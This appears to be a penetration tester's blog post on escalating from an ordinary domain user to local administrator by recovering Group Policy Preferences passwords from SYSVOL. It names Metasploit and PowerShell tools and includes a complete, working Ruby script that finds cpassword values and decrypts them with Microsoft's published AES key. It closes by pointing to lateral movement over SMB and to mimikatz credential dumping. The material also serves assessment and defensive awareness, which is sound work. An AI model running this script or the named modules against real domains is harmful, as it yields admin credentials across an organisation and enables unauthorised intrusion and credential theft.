Lateral movement..Part I

Scenario: you are a normal user in your company’s domain. No admin privileges. Nothing. You can’t even install a program on your machine.

What if I told you that you can be the local administrator on your machine, and probably on MANY more in your organization?

I can’t count the number of things you are able to do as a local admin (evil or non-evil) :-)…for this post I am going to demonstrate how simple it is to go from a normal domain user to local admin. This is an attack vector I have been using in various security assessments. Time to let the cat out of the bag…haha.


What are Group Policy Preferences passwords?

In a nutshell: sysadmins with a hundred-plus machines in a domain want to configure all of them the same way, and chances are they use the same local admin password everywhere to install programs and configure the hosts. Group Policy Preferences (GPP) is the convenient way to do that, so they create a GPO that pushes that local account and its password to every host in the domain. The catch is that the GPO is stored in SYSVOL, which every authenticated domain user can read, and the password sits in it as the cpassword attribute. Convenience at the expense of security; how many times do we see that??


Ways to find the GPP password?

To be honest, countless. But I shall show a few here..

  1. Manually traversing to \\<domain name>\SYSVOL\<domain name>\Policies\

Look for *.xml files under each GPO’s Machine\Preferences and User\Preferences folders; specifically Groups.xml or Services.xml, but ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can carry a cpassword too. No special rights are needed for this: SYSVOL is readable by every authenticated domain user.


Opening one of the Groups.xml files we see a cpassword attribute, which is encrypted with AES-256. Game over? NO. Microsoft published the decryption key in the public MS-GPPREF specification (the "Password Encryption" section): a whole 32-byte AES key, and the same one in every domain on the planet. Let that sink in.

So basically base64-decode the value, AES-decrypt it with that key (CBC mode, all-zero IV), strip the padding, and you have your local administrator password…in CLEARTEXT (it is stored as UTF-16LE, so decode it as such).

2. Use PowerShell tools:

For the lazy ones, there are multiple PowerShell tools that find and decrypt the GPP password. An example is Get-GPPPassword.ps1 (now shipped with PowerSploit); shoutout to the smart guy who wrote it, @obscuresec..


3. A custom tool designed to explicitly output the password in cleartext: gp3finder by Oliver Morton:


4. Trust Metasploit not to get left out…msf FTW! The auxiliary/scanner/smb/smb_enum_gpp module fetches and decrypts the XML files over SMB with a set of domain credentials, and post/windows/gather/credentials/gpp does the same from a Meterpreter session on a domain-joined host.

Okay, we get the point: it’s too easy to get this password.
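To make step 1 concrete, here is an added example (not code from the original post, and not any of the tools named above) that does by hand what steps 2 to 4 automate: it walks a Policies tree, parses every preference XML that can carry a cpassword (it goes beyond Groups.xml and Services.xml to the other four preference files that use the same attribute), and decrypts the values with Microsoft’s published key. It is written in Ruby, like Kali’s gpp-decrypt. The directory layout, GUIDs and the Groups.xml sample inside it are constructed for the example; the first cpassword in the sample is the widely circulated test value that decrypts to Local*P4ssword!, and the second account deliberately has no password set so the skip path is exercised.

```ruby
# Added example, not code from the original post: decrypt GPP "cpassword" values and
# pull them out of the preference XML files found under SYSVOL\<domain>\Policies.
# Same technique as Kali's gpp-decrypt. The key is the one Microsoft published in
# MS-GPPREF; the file layout, GUIDs and sample XML below are constructed for this example.
require 'openssl'
require 'base64'
require 'rexml/document'
require 'fileutils'
require 'tmpdir'

# The published 32-byte AES-256 key. Hard-coded in GPP, identical in every domain.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze

# Every preference file that can carry a cpassword, and the attribute that names the
# account in each (Groups/Drives/Printers: userName, Services: accountName,
# ScheduledTasks: runAs, DataSources: username).
GPP_FILES  = %w[Groups.xml Services.xml ScheduledTasks.xml DataSources.xml Drives.xml Printers.xml].freeze
NAME_ATTRS = %w[userName accountName runAs username].freeze

# cpassword -> cleartext. GPP strips the base64 '=' padding, encrypts with AES-256-CBC
# under an all-zero IV with PKCS#7 padding, and stores the password as UTF-16LE.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = "\x00".b * 16
  plain = cipher.update(Base64.strict_decode64(padded)) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# The inverse, to build test data and to show there is no secret involved at all.
def encrypt_cpassword(password)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.encrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = "\x00".b * 16
  ct = cipher.update(password.encode('UTF-16LE').b) + cipher.final
  Base64.strict_encode64(ct).delete('=')
end

# One XML file -> [{name:, password:, cpassword:, changed:}]. Entries without a password
# (e.g. an account created or deleted without one) have cpassword="" and are skipped.
def extract_gpp_creds(xml_text)
  doc = REXML::Document.new(xml_text)
  REXML::XPath.match(doc, '//Properties[@cpassword]').each_with_object([]) do |props, creds|
    cpass = props.attributes['cpassword']
    next if cpass.nil? || cpass.empty?
    name = NAME_ATTRS.map { |a| props.attributes[a] }.compact.first
    creds << { name: name, password: decrypt_cpassword(cpass), cpassword: cpass,
               changed: props.parent.attributes['changed'] }
  end
end

# Walk a Policies tree (a mounted SYSVOL share or an offline copy) and return
# [{file:, creds:}] for every preference file that held at least one password.
# The base: option keeps braces in GPO GUID directory names out of the glob pattern.
def scan_policies(root)
  Dir.glob("**/{#{GPP_FILES.join(',')}}", base: root).sort.each_with_object([]) do |rel, hits|
    path  = File.join(root, rel)
    creds = extract_gpp_creds(File.read(path, mode: 'r:bom|utf-8')) # GPP writes a UTF-8 BOM
    hits << { file: path, creds: creds } unless creds.empty?
  end
end

# Constructed Groups.xml in the real layout (uids and timestamps are made up). The first
# cpassword is the widely circulated test value that decrypts to Local*P4ssword!; the
# second account has no password set.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2014-05-06 10:15:42" uid="{8B7B4D1E-2C6A-4A0F-9E2B-5D3C1F7A6B01}">
      <Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
    </User>
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2" changed="2014-05-06 10:16:01" uid="{0C2E5F9A-7D14-4B3E-8A6F-1E9D2C4B7A02}">
      <Properties action="C" newName="" fullName="" description="" cpassword="" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="helpdesk"/>
    </User>
  </Groups>
XML

if __FILE__ == $0
  # Stand-alone demo: build a fake Policies\{GPO GUID}\Machine\Preferences\Groups\ tree in a
  # temp dir, drop the sample file in it and run the scan, as you would against the real share.
  Dir.mktmpdir('policies') do |root|
    dir = File.join(root, '{31B2F340-016D-11D2-945F-00C04FB984F9}', 'Machine', 'Preferences', 'Groups')
    FileUtils.mkdir_p(dir)
    File.write(File.join(dir, 'Groups.xml'), SAMPLE_GROUPS_XML)
    scan_policies(root).each do |hit|
      hit[:creds].each { |c| puts "#{hit[:file]}: #{c[:name]} => #{c[:password]} (changed #{c[:changed]})" }
    end
  end
end
```

Point `scan_policies` at a mounted copy of `\\<domain name>\SYSVOL\<domain name>\Policies` and it returns every account and cleartext password in the tree; the `changed` timestamp tells you how long that password has been sitting there. The encrypt half is included to make the point of the post: with a public key and a fixed IV, "encrypted" and "cleartext" are the same thing.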

Now that we have the local admin password..

The mere fact that you got this password from GPP tells you one thing: chances are it is used on most, if not all, machines in the domain! Think about the lateral movement that is possible (that local admin account authenticates over SMB to every box that received the same GPO), and the dumping of credentials from each host you land on; mimikatz, anyone?

That doesn’t sound so good for the blue teamers, right? In the next post we are going to see practical ways to mitigate this.

Remember this is not a new attack vector. Microsoft’s MS14-025 patch (May 2014) stopped the Group Policy tools from writing new cpassword values, but it does not remove the XML files already sitting in SYSVOL; the reason I am putting this up is that in all the penetration testing assessments I have been doing, this has been a recurring vulnerability.


